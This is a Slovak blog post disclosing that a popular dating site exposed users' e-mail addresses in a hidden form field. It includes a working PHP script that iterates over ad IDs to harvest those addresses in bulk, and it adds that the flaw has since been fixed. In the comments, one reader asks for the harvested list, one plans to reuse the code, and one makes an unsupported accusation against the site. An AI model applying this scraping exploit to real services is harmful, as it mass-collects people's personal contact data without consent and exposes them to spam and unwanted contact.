Predstavte si najnavštevovanejšiu zoznamku na slovenskom internete. Je ňou pravdepodobne Azet zoznamka. Od takejto služby by sa očákavalo, že bude aj na patričnej bezpečnostnej úrovni - ale omyl. Bez najmenších problémov ide získať desaťtisíce e-mailových adries jeho nič netušiacich používateľov.
Túto chybu objavil synopsi.
Ako zoznamka.sk funguje a kde je problém
Záujemca, ktorý hľadá partnera vyplní svoj inzerát a okrem iného zadá aj svôj e-mail, cez ktorý mu služba bude preposielať odpovede prípadných záujemcov. Tento email má byť verejnosti skrytý ale nie je tomu tak. Ak si pozornejšie prezrieme zdrojový kód napríklad inzerátu http://zoznamka.azet.sk/viac.phtml?&c_inz=545727, nájdeme tam v hidden formulárovom poli nijako neskrytý e-mail!
Synopsi vytvoril skript v jazyku Perl, ktorý postupne prechádza každý inzerát a získava adresu. Ja som sa nudil a vytvoril niečo podobné v PHP. Je to naozaj jednoduché.
Ako na to v PHP
Postačia nám na to dve vstavané funkcie PHP - file_get_contents() a explode().
<?php
Function getEmails($from, $to) {
for ($i=$from; $i< $to; $i++) {
// nacitame html kod do premennej
$source = @file_get_contents("http://zoznamka.azet.sk/viac.phtml?&c_inz=".$i);
// cez explode() ziskame e-mail
$step1 = explode('<input type="hidden" name="email" value="', $source);
$step2 = explode('"', $step1[1]);
// vypiseme email
if ($step2[0]<>"") echo $step2[0]."<br />";
// zabezpecime okamzity vypis, necakame na dokoncenie skriptu
ob_flush(); flush();
}
}
?>
Update: Páni z Azetu to dnes ráno niečo po 10:00 už opravili, takže exploit už nefunguje (neuvádzam už ani link). Ale pozrieť si môžete aspoň video ;-)
4 komentárov:
Ahoj, mohol by si mi poslat vieš čo ne? :) dakujem
umaka@post.sk
Nazdar, dúfam že je ten kód open source, niekedy by sa mi zišiel. Tak ak nevadí, tak si ho modifikujem.Nič verejné:) Cyberpunker
v poriadku. inak by som ho nezverejnoval. ;-)
azet podporuje pedofilov a podvodnikov.Vsetka pravda na www.neutralzone.sk
Na uzivatelov kaslu a neplnia bezpecnostne normy.
Zverejnenie komentára